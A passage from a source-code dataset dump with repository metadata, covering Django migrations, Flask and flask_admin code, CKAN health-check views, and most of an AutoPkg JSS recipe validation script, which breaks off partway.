# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_phov2/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_phov2', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/Photons_76Xids/phov2/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28696958},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunB//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunB', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunB.root', 'lumi': 5.401, 'nEvts': 211415403},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/CMSSW_8_0_13_patch1/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_2016_RunC//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'SingleElectron_2016_RunC', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/data//TnPTree_SingleElectron_2016_RunC.root', 'lumi': 1.730, 'nEvts': 62332526},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_madgraph//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-madgraphMLM-pythia8.root', 'lumi': -1, 'nEvts': 49877138},
# {'lumiProcessedFile': '/afs/cern.ch/work/f/fcouderc/public/EGamma/TnP/new/CMSSW_8_0_10/src/PhysicsTools/TagAndProbe/crab/crab_projects_RECOv3/crab_DYToLL_mcAtNLO//results/processedLumis.json', 'campaign': 'crab_projects_RECOv3', 'dataset': 'DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8', 'file': '/store/group/phys_egamma/tnp/80X/RecoSF/RECOv3/mc//TnPTree_DYJetsToLL_M-50_TuneCUETP8M1_13TeV-amcatnloFXFX-pythia8.root', 'lumi': -1, 'nEvts': 28328619}
]
|
[
"[email protected]"
] | |
2c513021cb031fcdb1c6bf1db308b216812e673a
|
ca259dd96261af73d470cbf93714db8219511111
|
/core/apps/storage/migrations/0008_cephstorage.py
|
bf075e00083b8a727ce04d05db9db269fbab0952
|
[
"Apache-2.0"
] |
permissive
|
jedia168/KubeOperator
|
243812a898646b90b38aab56af672b1e218191ff
|
87917cf95f88584ddbc68c50522656bbe42934ec
|
refs/heads/master
| 2021-05-23T00:40:32.206564 | 2020-04-03T10:44:39 | 2020-04-03T10:44:57 | 253,158,258 | 3 | 0 |
Apache-2.0
| 2020-04-05T04:53:20 | 2020-04-05T04:53:20 | null |
UTF-8
|
Python
| false | false | 684 |
py
|
# Generated by Django 2.1.11 on 2019-12-05 04:06
import common.models
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('storage', '0007_auto_20191024_0442'),
]
operations = [
migrations.CreateModel(
name='CephStorage',
fields=[
('id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
('name', models.CharField(max_length=255, unique=True)),
('vars', common.models.JsonDictTextField()),
('date_created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"[email protected]"
] | |
df9d8d9d26b3a715fd17b4a1fdbf8b7ea5a0026c
|
477b72708f02ec317a371b9bedfa65d316c48d3c
|
/server-flask/config.py
|
c34f090a816b9c03461f2725f469a3f97a218263
|
[] |
no_license
|
AJenbo/web-api-project
|
bd01ba898f05d84abee3d89d39b57cf31f809fa2
|
ae2aa17f1011fe8ac655b8092cee6a4d34e8cda9
|
refs/heads/master
| 2021-02-11T13:17:23.949374 | 2020-03-02T19:15:35 | 2020-03-02T23:04:53 | 244,494,129 | 1 | 0 | null | 2020-03-02T23:02:47 | 2020-03-02T23:02:47 | null |
UTF-8
|
Python
| false | false | 276 |
py
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
class Config(object):
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'app.db')
SQLALCHEMY_TRACK_MODIFICATIONS = False
JSON_SORT_KEYS = False
|
[
"[email protected]"
] | |
2d3a95480d633d66c46ef3c824a7c54fbf5b8504
|
3c8742678e10ce40f10da9499ed0aa4a7e5b3792
|
/flask/Lib/site-packages/flask_admin/model/fields.py
|
da38982fa16ddcac6e15042fa18b8373d3843569
|
[] |
no_license
|
SYFT/brushproblem
|
f7f47f194a8bc1110bbfb615861268a2a4f3f84d
|
9818f89e645d324443ee22851f597c0904ef78a3
|
refs/heads/master
| 2021-01-18T21:51:53.393103 | 2016-09-11T04:01:48 | 2016-09-11T04:01:48 | 55,394,355 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,381 |
py
|
import itertools
from wtforms.validators import ValidationError
from wtforms.fields import FieldList, FormField, SelectFieldBase
try:
from wtforms.fields import _unset_value as unset_value
except ImportError:
from wtforms.utils import unset_value
from flask_admin._compat import iteritems
from .widgets import (InlineFieldListWidget, InlineFormWidget,
AjaxSelect2Widget, XEditableWidget)
class InlineFieldList(FieldList):
widget = InlineFieldListWidget()
def __init__(self, *args, **kwargs):
super(InlineFieldList, self).__init__(*args, **kwargs)
def __call__(self, **kwargs):
# Create template
meta = getattr(self, 'meta', None)
if meta:
template = self.unbound_field.bind(form=None, name='', _meta=meta)
else:
template = self.unbound_field.bind(form=None, name='')
# Small hack to remove separator from FormField
if isinstance(template, FormField):
template.separator = ''
template.process(None)
return self.widget(self,
template=template,
check=self.display_row_controls,
**kwargs)
def display_row_controls(self, field):
return True
def process(self, formdata, data=unset_value):
res = super(InlineFieldList, self).process(formdata, data)
# Postprocess - contribute flag
if formdata:
for f in self.entries:
key = 'del-%s' % f.id
f._should_delete = key in formdata
return res
def validate(self, form, extra_validators=tuple()):
"""
Validate this FieldList.
Note that FieldList validation differs from normal field validation in
that FieldList validates all its enclosed fields first before running any
of its own validators.
"""
self.errors = []
# Run validators on all entries within
for subfield in self.entries:
if not self.should_delete(subfield) and not subfield.validate(form):
self.errors.append(subfield.errors)
chain = itertools.chain(self.validators, extra_validators)
self._run_validation_chain(form, chain)
return len(self.errors) == 0
def should_delete(self, field):
return getattr(field, '_should_delete', False)
def populate_obj(self, obj, name):
values = getattr(obj, name, None)
try:
ivalues = iter(values)
except TypeError:
ivalues = iter([])
candidates = itertools.chain(ivalues, itertools.repeat(None))
_fake = type(str('_fake'), (object, ), {})
output = []
for field, data in zip(self.entries, candidates):
if not self.should_delete(field):
fake_obj = _fake()
fake_obj.data = data
field.populate_obj(fake_obj, 'data')
output.append(fake_obj.data)
setattr(obj, name, output)
class InlineFormField(FormField):
"""
Inline version of the ``FormField`` widget.
"""
widget = InlineFormWidget()
class InlineModelFormField(FormField):
"""
Customized ``FormField``.
Excludes model primary key from the `populate_obj` and
handles `should_delete` flag.
"""
widget = InlineFormWidget()
def __init__(self, form_class, pk, form_opts=None, **kwargs):
super(InlineModelFormField, self).__init__(form_class, **kwargs)
self._pk = pk
self.form_opts = form_opts
def get_pk(self):
return getattr(self.form, self._pk).data
def populate_obj(self, obj, name):
for name, field in iteritems(self.form._fields):
if name != self._pk:
field.populate_obj(obj, name)
class ListEditableFieldList(FieldList):
"""
Modified FieldList to allow for alphanumeric primary keys.
Used in the editable list view.
"""
widget = XEditableWidget()
def __init__(self, *args, **kwargs):
super(ListEditableFieldList, self).__init__(*args, **kwargs)
# min_entries = 1 is required for the widget to determine the type
self.min_entries = 1
def _extract_indices(self, prefix, formdata):
offset = len(prefix) + 1
for name in formdata:
# selects only relevant field (not CSRF, other fields, etc)
if name.startswith(prefix):
# exclude offset (prefix-), remaining text is the index
yield name[offset:]
def _add_entry(self, formdata=None, data=unset_value, index=None):
assert not self.max_entries or len(self.entries) < self.max_entries, \
'You cannot have more than max_entries entries in this FieldList'
if index is None:
index = self.last_index + 1
self.last_index = index
# '%s-%s' instead of '%s-%d' to allow alphanumeric
name = '%s-%s' % (self.short_name, index)
id = '%s-%s' % (self.id, index)
# support both wtforms 1 and 2
meta = getattr(self, 'meta', None)
if meta:
field = self.unbound_field.bind(
form=None, name=name, prefix=self._prefix, id=id, _meta=meta
)
else:
field = self.unbound_field.bind(
form=None, name=name, prefix=self._prefix, id=id
)
field.process(formdata, data)
self.entries.append(field)
return field
def populate_obj(self, obj, name):
# return data from first item, instead of a list of items
setattr(obj, name, self.data.pop())
class AjaxSelectField(SelectFieldBase):
"""
Ajax Model Select Field
"""
widget = AjaxSelect2Widget()
separator = ','
def __init__(self, loader, label=None, validators=None, allow_blank=False, blank_text=u'', **kwargs):
super(AjaxSelectField, self).__init__(label, validators, **kwargs)
self.loader = loader
self.allow_blank = allow_blank
self.blank_text = blank_text
def _get_data(self):
if self._formdata:
model = self.loader.get_one(self._formdata)
if model is not None:
self._set_data(model)
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def _format_item(self, item):
value = self.loader.format(self.data)
return (value[0], value[1], True)
def process_formdata(self, valuelist):
if valuelist:
if self.allow_blank and valuelist[0] == u'__None':
self.data = None
else:
self._data = None
self._formdata = valuelist[0]
def pre_validate(self, form):
if not self.allow_blank and self.data is None:
raise ValidationError(self.gettext(u'Not a valid choice'))
class AjaxSelectMultipleField(AjaxSelectField):
"""
Ajax-enabled model multi-select field.
"""
widget = AjaxSelect2Widget(multiple=True)
def __init__(self, loader, label=None, validators=None, default=None, **kwargs):
if default is None:
default = []
super(AjaxSelectMultipleField, self).__init__(loader, label, validators, default=default, **kwargs)
self._invalid_formdata = False
def _get_data(self):
formdata = self._formdata
if formdata:
data = []
# TODO: Optimize?
for item in formdata:
model = self.loader.get_one(item) if item else None
if model:
data.append(model)
else:
self._invalid_formdata = True
self._set_data(data)
return self._data
def _set_data(self, data):
self._data = data
self._formdata = None
data = property(_get_data, _set_data)
def process_formdata(self, valuelist):
self._formdata = set()
for field in valuelist:
for n in field.split(self.separator):
self._formdata.add(n)
def pre_validate(self, form):
if self._invalid_formdata:
raise ValidationError(self.gettext(u'Not a valid choice'))
|
[
"[email protected]"
] | |
b46fa81c4d5e37b46a911e6053109b9b90a22674
|
9ccdadf53de7768ea10add415cbfcd76438178e4
|
/apps/sushi/migrations/0036_credentials_intermediate_report_types.py
|
51df8aafa473ce662dedadbdb135d81d599d3c53
|
[
"MIT"
] |
permissive
|
techlib/celus
|
80e587b3238acf26007f654a38cbdeab558de39b
|
3b70d8d627b66b8181f3aaba572929a1daeca106
|
refs/heads/master
| 2023-07-08T10:42:12.252165 | 2023-04-12T13:02:19 | 2023-07-03T10:25:33 | 186,565,967 | 10 | 4 |
MIT
| 2023-02-15T19:53:48 | 2019-05-14T07:14:23 |
Python
|
UTF-8
|
Python
| false | false | 2,453 |
py
|
# Generated by Django 2.2.15 on 2020-10-01 10:59
from django.db import migrations, models
def active_couter_reports_to_counter_reports(apps, schema_editor):
CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials')
SushiCredentials = apps.get_model('sushi', 'SushiCredentials')
for credentials in SushiCredentials.objects.all():
for counter_report in credentials.active_counter_reports.all():
CounterReportsToCredentials.objects.create(
credentials=credentials, counter_report=counter_report
)
def couter_reports_to_active_counter_reports(apps, schema_editor):
CounterReportsToCredentials = apps.get_model('sushi', 'CounterReportsToCredentials')
for cr2c in CounterReportsToCredentials.objects.all():
cr2c.credentials.active_counter_reports.add(cr2c.counter_report)
class Migration(migrations.Migration):
dependencies = [('sushi', '0035_sushifetchattempt_http_status_code')]
operations = [
migrations.CreateModel(
name='CounterReportsToCredentials',
fields=[
(
'id',
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name='ID'
),
),
(
'credentials',
models.ForeignKey(
on_delete=models.deletion.CASCADE, to='sushi.SushiCredentials'
),
),
(
'counter_report',
models.ForeignKey(
on_delete=models.deletion.CASCADE, to='sushi.CounterReportType'
),
),
],
options={'unique_together': {('credentials', 'counter_report')}},
),
migrations.AddField(
model_name='sushicredentials',
name='counter_reports',
field=models.ManyToManyField(
through='sushi.CounterReportsToCredentials',
to='sushi.CounterReportType',
related_name='sushicredentials_set',
),
),
migrations.RunPython(
active_couter_reports_to_counter_reports, couter_reports_to_active_counter_reports
),
migrations.RemoveField(model_name='sushicredentials', name='active_counter_reports'),
]
|
[
"[email protected]"
] | |
50f8904f9744ae5e5e841a4571e1af382fd9b1e9
|
c07f45a57aee12a227ac5efa48a785981b74e608
|
/ckanext/ckanext-apicatalog/ckanext/apicatalog/views/__init__.py
|
20adf432d9d9df71246a074f9cbe87af007926e4
|
[
"AGPL-3.0-only",
"MIT"
] |
permissive
|
vrk-kpa/api-catalog
|
44d465d3c9c12c41ef281f2073349777fdbdf9bf
|
a4dc0d12cd5d8886a2b46f62efe124fe5d26e799
|
refs/heads/master
| 2023-08-22T05:22:09.609871 | 2023-06-19T11:05:57 | 2023-06-19T11:05:57 | 42,986,648 | 19 | 9 |
MIT
| 2023-08-23T07:06:35 | 2015-09-23T07:54:38 |
HTML
|
UTF-8
|
Python
| false | false | 1,140 |
py
|
from flask import Blueprint, Response
from ckan.plugins.toolkit import render, c
from ckanext.apicatalog.helpers import get_announcements
import ckanext.apicatalog.health as health
import logging
log = logging.getLogger(__name__)
def get_blueprints():
return [announcements_bp, health_bp]
# Announcements
def announcements():
c.announcement_list = get_announcements(50)
return render(u'announcements/index.html')
announcements_bp = Blueprint("announcements", __name__)
announcements_bp.add_url_rule(u'/announcements', view_func=announcements)
# Health
def health_check():
try:
health.heartbeat()
except health.HealthError as e:
return Response(e.message, status=503)
return Response('OK')
def health_xroad_catalog_heartbeat():
try:
health.xroad_catalog_heartbeat()
return Response('OK')
except health.HealthError as e:
return Response(e.message, status=503)
health_bp = Blueprint('health', __name__)
health_bp.add_url_rule(u'/health', view_func=health_check)
health_bp.add_url_rule(u'/xroad_catalog_heartbeat', view_func=health_xroad_catalog_heartbeat)
|
[
"[email protected]"
] | |
3f3081f32d5f4e05e8080904f17d349273eb67bb
|
2fd5ce9b3fb4f7cc545e3d42181ef89af7e11c05
|
/validate_recipes.py
|
36500a60114163f8feebf0884bc8737597bea0f4
|
[] |
no_license
|
AllWorkAndNoPlay/jss-recipes
|
a9b4d3bde4c1bab41e2e5932a26cd52c5971b8d2
|
bd62d5a2ba585d4df5e3526c69aa6572cc8191ff
|
refs/heads/master
| 2023-06-24T21:04:10.046947 | 2023-06-09T17:29:05 | 2023-06-09T17:29:05 | 52,827,593 | 0 | 1 | null | 2017-11-28T00:17:48 | 2016-02-29T21:53:21 |
Python
|
UTF-8
|
Python
| false | false | 28,612 |
py
|
#!/usr/bin/python
# Copyright (C) 2014-2015 Shea G Craig
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""validate_recipes.py
usage: validate_recipes.py [-h] [-v] recipe [recipe ...]
Test recipes for compliance with the jss-recipe style guide.
positional arguments:
recipe Path to a recipe to validate, or to a folder, to recursively
test all contained recipes.
optional arguments:
-h, --help show this help message and exit
-v, --verbose Display results of all tests.
"""
import argparse
import os
import subprocess
import sys
# pylint: disable=no-name-in-module
from Foundation import (NSData,
NSPropertyListSerialization,
NSPropertyListMutableContainersAndLeaves,
NSPropertyListXMLFormat_v1_0)
# pylint: enable=no-name-in-module
__version__ = "1.0.0"
REQUIRED_ARGUMENTS = (
"self_service_description",
"category",
"policy_template",
"self_service_icon",
"policy_category")
OPTIONAL_ARGUMENTS = (
"jss_inventory_name",
"os_requirements")
PROHIBITED_ARGUMENTS = (
"site_name",
"site_id")
VALID_CATEGORIES = (
"Computer Science",
"Digital Media",
"Games",
"Management",
"Print and Scan",
"Productivity",
"Science and Math",
"Utility")
ALLOWED_EXTENSION_ATTRIBUTES = (
"CFBundleVersionExtensionAttribute.xml"
)
class Error(Exception):
"""Module base exception."""
pass
class PlistParseError(Error):
"""Error parsing a plist file."""
pass
class Plist(dict):
"""Abbreviated plist representation (as a dict)."""
def __init__(self, filename=None):
"""Init a Plist, optionally from parsing an existing file.
Args:
filename: String path to a plist file.
"""
if filename:
dict.__init__(self, self.read_file(filename))
else:
dict.__init__(self)
self.new_plist()
self.filename = os.path.abspath(filename)
def read_file(self, path):
"""Replace internal XML dict with data from plist at path.
Args:
path: String path to a plist file.
Raises:
PlistParseError: Error in reading plist file.
"""
# pylint: disable=unused-variable
info, pformat, error = (
NSPropertyListSerialization.propertyListWithData_options_format_error_(
NSData.dataWithContentsOfFile_(os.path.expanduser(path)),
NSPropertyListMutableContainersAndLeaves,
None,
None
))
# pylint: enable=unused-variable
if info is None:
if error is None:
error = "Invalid plist file."
raise PlistParseError("Can't read %s: %s" % (path, error))
return info
class Results(object):
"""Collects test results and manages their output."""
def __init__(self):
self.results = []
def add_result(self, result):
self.results.append(result)
def report(self, verbose=False):
if verbose or not all((result[0] for result in self.results)):
for result in self.results:
if verbose or not result[0]:
self._print_result(result)
else:
print "OK"
def report_all(self):
self.report(verbose=True)
def _print_result(self, line):
print "Test: %s Result: %s" % (line[1], line[0])
def get_argument_parser():
"""Build and return argparser for this app."""
parser = argparse.ArgumentParser(description="Test recipes for compliance "
"with the jss-recipe style guide.")
parser.add_argument("recipe", nargs="+", help="Path to a recipe to "
"validate, or to a folder, to recursively test all "
"contained recipes.")
parser.add_argument("-v", "--verbose", help="Display results of all "
"tests.", action="store_true")
return parser
def get_recipes(recipes):
"""Build a list of recipes from filename or dirname.
Args:
recipes: A string filename or path to a directory. Directories
will be recursively searched for files ending with
'.jss.recipe'.
Returns:
List of recipe files.
"""
result = []
if os.path.isfile(recipes):
result.append(recipes)
elif os.path.isdir(recipes):
for root, dirs, files in os.walk(recipes):
for filename in files:
if filename.endswith(".jss.recipe"):
result.append(os.path.join(root, filename))
return result
def validate_recipe(recipe_path, verbose=False):
"""Test a recipe for compliance, printing progress.
Args:
recipe_path: String path to recipe file.
"""
tests = (
test_filename_prefix,
test_filename_suffix,
test_recipe_parsing,
test_is_in_subfolder,
test_folder_contents_have_common_prefix,
test_no_restricted_files_in_folder,
test_parent_recipe,
test_identifier,
test_single_processor,
test_name_prod_name,
test_argument_values,
test_no_prohibited_arguments,
test_input_section,
test_category_value,
test_policy_category_value,
test_policy_template_value,
test_icon_name,
test_group_name,
test_group_template,
test_groups_argument,
test_extension_attributes,
test_scripts,
test_icon,
test_lint)
header = " Testing recipe: %s " % recipe_path
print_bar(len(header))
print header
print_bar(len(header))
if os.path.exists(recipe_path):
recipe = get_recipe(recipe_path)
else:
print "File not found."
sys.exit(1)
results = Results()
for test in tests:
try:
result = test(recipe)
# Handle missing plist keys rather than try to test for each
# bit of a recipe.
except KeyError as err:
result = (False, "'%s' failed with missing key: '%s'" %
(test.__name__, err.message))
except AttributeError as err:
result = (False, "'%s' failed with missing attribute" %
test.__name__)
results.add_result(result)
if verbose:
results.report_all()
else:
results.report()
def get_recipe(recipe_path):
"""Open a recipe file as an ElementTree.
Args:
recipe_path: String path to recipe file.
Returns:
ElementTree of the recipe, exception message if the recipe has parsing
errors, or None if that file does not exist.
"""
try:
recipe = Plist(recipe_path)
except IOError:
recipe = None
except PlistParseError as err:
recipe = err.message
except ValueError:
recipe = u"File does not exist."
return recipe
def test_filename_prefix(recipe):
"""Tests filename for correct prefix.
Args:
recipe_path: String path to a recipe file.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
name = recipe["Input"].get("NAME")
result = os.path.basename(recipe.filename).startswith(name)
description = "Recipe has correct prefix (NAME: '%s')" % name
return (result, description)
def test_filename_suffix(recipe):
"""Tests filename for correct ending.
Args:
recipe_path: String path to a recipe file.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = os.path.basename(recipe.filename).endswith(".jss.recipe")
description = "Recipe has correct ending ('.jss.recipe')"
return (result, description)
def test_recipe_parsing(recipe):
"""Determine whether recipe file exists and parses.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "Recipe parses correctly."
if not recipe:
description += " (Recipe file not found!)"
elif isinstance(recipe, unicode):
# There was a parsing error. Print the message and finish.
description += " (%s)" % recipe
else:
result = True
return (result, description)
def test_is_in_subfolder(recipe):
"""Determine whether recipe file is in a product subfolder.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
name = recipe["Input"].get("NAME")
description = "Recipe is in a subfolder named (NAME: '%s')." % name
dirname = os.path.dirname(recipe.filename).rsplit("/", 1)[1]
result = dirname == name
return (result, description)
def test_folder_contents_have_common_prefix(recipe):
"""Determine whether folder contents have a common prefix of NAME.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
name = recipe["Input"].get("NAME")
description = "All files have prefix of product (NAME: '%s')." % name
files = os.listdir(os.path.dirname(recipe.filename))
result = all((filename.startswith(name) or filename == ".DS_Store"
for filename in files))
return (result, description)
def test_no_restricted_files_in_folder(recipe):
"""Determine whether folder contents have a common prefix of NAME.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = None
restricted_files = ["PolicyTemplate.xml", "SmartGroupTemplate.xml"]
description = ("None of the restricted templates %s are in recipe's "
"folder." % restricted_files)
files = os.listdir(os.path.dirname(recipe.filename))
result = all(restricted_file not in files for restricted_file in
restricted_files)
return (result, description)
def test_parent_recipe(recipe):
"""Determine whether parent recipe is in AutoPkg org and not None.
Uses a GitHub personal access token if one has been generated.
This is helpful if you're validating a bunch of recipes at once and
hitting the rate limit.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
parent = recipe.get("ParentRecipe")
result = False
description = "Parent Recipe is in AutoPkg org."
if parent:
cmd = ["autopkg", "search", parent]
if os.path.exists(os.path.expanduser("~/.autopkg_gh_token")):
cmd.insert(2, "--use-token")
search_results = subprocess.check_output(cmd)
expected_parents = (".pkg.recipe", ".download.recipe")
if any(exp_par in search_results for exp_par in expected_parents):
info_process = subprocess.Popen(["autopkg", "info", parent],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
# Send an "n" in case it didn't find anything.
info_results = info_process.communicate("n")
if "Didn't find a recipe for" in info_results[0]:
description += (" (ParentRecipe repo not available. Add and "
"retry.)")
else:
# Assume that since it found something, it's good.
result = True
else:
description += " (ParentRecipe not set.)"
return (result, description)
def test_identifier(recipe):
"""Test recipe identifier for proper construction.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
name = recipe["Input"].get("NAME")
if name:
# The identifier may not have spaces.
name = name.replace(" ", "")
description = ("Recipe identifier follows convention. "
"('com.github.jss-recipes.jss.%s')" % name)
result = False
identifier = recipe.get("Identifier")
if identifier and name:
if (str(identifier).startswith("com.github.jss-recipes.jss.") and
str(identifier).rsplit(".", 1)[1].startswith(name)):
result = True
return (result, description)
def test_single_processor(recipe):
"""Test for recipe having a single processor.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
description = "Recipe has only a single processor, of type 'JSSImporter'."
result = False
processors = recipe.get("Process")
if len(processors) == 1:
processor = processors[0].get("Processor")
if processor and processor == "JSSImporter":
result = True
else:
description += " (Processor is not 'JSSImporter')"
else:
description += " (Too many processors: %s > 1)" % len(processors)
return (result, description)
def get_jssimporter(recipe):
"""Return the JSSImporter processor section or None."""
processors = [processor for processor in recipe["Process"] if
processor.get("Processor") == "JSSImporter"]
if len(processors) == 1:
result = processors.pop()
else:
result = None
return result
def test_argument_values(recipe):
"""Test for all arguments to JSSImporter being replacement vars.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = ("All required and optional arguments to JSSImporter are "
"%ALL_CAPS% replacement variables, and are present.")
required_argument_values = (get_jssimporter(recipe)["Arguments"].get(
argument) for argument in REQUIRED_ARGUMENTS)
optional_argument_values = (get_jssimporter(recipe)["Arguments"].get(
argument) for argument in OPTIONAL_ARGUMENTS)
valid_required_values = all((val and val.isupper() and val.startswith("%")
and val.endswith("%") for val in
required_argument_values))
valid_optional_values = all((val.isupper() and val.startswith("%") and
val.endswith("%") for val in
required_argument_values if val))
if valid_required_values and valid_optional_values:
result = True
return (result, description)
def test_name_prod_name(recipe):
"""Test for name Input and prod_name arg.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "NAME is set, and prod_name is %NAME%."
if ("NAME" in recipe["Input"] and
get_jssimporter(recipe)["Arguments"].get("prod_name") == "%NAME%"):
result = True
return (result, description)
def test_no_prohibited_arguments(recipe):
"""Tests for prohibited arguments.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "No prohibited arguments."
arguments = get_jssimporter(recipe)["Arguments"]
if all((not prohibited_arg in arguments for prohibited_arg in
PROHIBITED_ARGUMENTS)):
result = True
return (result, description)
def test_input_section(recipe):
"""Test for all required and optional args in input section.
All args should have actual values set in input section. Also,
names must follow the convention of being ALL_CAPS equivalent of
JSSImporter argument.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = ("All required and optional arguments to JSSImporter are "
"set in 'Input' section with ALL_CAPS keys.")
required_input_keys = (recipe["Input"].get(argument.upper()) for argument
in REQUIRED_ARGUMENTS)
# Optional key must be present in JSSImporter args also!
optional_input_keys = (recipe["Input"].get(argument.upper()) for argument
in OPTIONAL_ARGUMENTS if
get_jssimporter(recipe)["Arguments"].get(argument))
valid_required_keys = all((key is not None for key in required_input_keys))
valid_optional_keys = all((key is not None for key in optional_input_keys))
if valid_required_keys and valid_optional_keys:
result = True
return (result, description)
def test_category_value(recipe):
"""Test for valid category.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "CATEGORY is in approved list."
result = recipe["Input"].get("CATEGORY") in VALID_CATEGORIES
return (result, description)
def test_policy_category_value(recipe):
"""Test that policy category is Testing.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "POLICY_CATEGORY is 'Testing'."
result = (recipe["Input"].get("POLICY_CATEGORY") == "Testing")
return (result, description)
def test_policy_template_value(recipe):
"""Test that policy template is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "POLICY_TEMPLATE is 'PolicyTemplate.xml'."
result = recipe["Input"].get("POLICY_TEMPLATE") == "PolicyTemplate.xml"
return (result, description)
def test_icon_name(recipe):
"""Test that icon name is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "SELF_SERVICE_ICON name is NAME.png or %NAME%.png."
result = (recipe["Input"].get("SELF_SERVICE_ICON") in
(recipe["Input"].get("NAME") + ".png",
"%NAME%.png"))
return (result, description)
def test_group_name(recipe):
"""Test that group name is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "GROUP_NAME is '%NAME%-update-smart'."
result = recipe["Input"].get("GROUP_NAME") == "%NAME%-update-smart"
return (result, description)
def test_group_template(recipe):
"""Test that group template is valid.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
required_template = "SmartGroupTemplate.xml"
cfbundletemplate = "CFBundleVersionSmartGroupTemplate.xml"
description = "GROUP_TEMPLATE is '%s'." % required_template
name = recipe["Input"].get("NAME")
group_template = recipe["Input"].get("GROUP_TEMPLATE")
if group_template == required_template:
result = True
else:
# Check to see if there is an extension attribute, requiring a
# custom group template.
has_ext_attrs = get_jssimporter(recipe)["Arguments"].get(
"extension_attributes")
if has_ext_attrs and group_template in [name + required_template,
cfbundletemplate]:
result = True
description = ("GROUP_TEMPLATE is '%s' (Properly formed "
"extension-attribute-supporting smart group "
"template provided." % (name + required_template))
return (result, description)
def test_groups_argument(recipe):
"""Test that groups argument is as specified in style-guide.
Args:
recipe: Recipe object.
Returns:
Tuple of Bool: Failure or success, and a string describing the
test and result.
"""
result = False
description = "'groups' argument to JSSImporter is correct."
groups_args = get_jssimporter(recipe)["Arguments"]["groups"]
groups_len_compliant = len(groups_args) == 1
if groups_len_compliant:
group = groups_args[0]
group_name_compliant = group["name"] == "%GROUP_NAME%"
group_smart_compliant = group["smart"] == True
group_template_compliant = group["template_path"] == "%GROUP_TEMPLATE%"
if all((group_name_compliant, group_smart_compliant,
group_template_compliant)):
result = True
return (result, description)
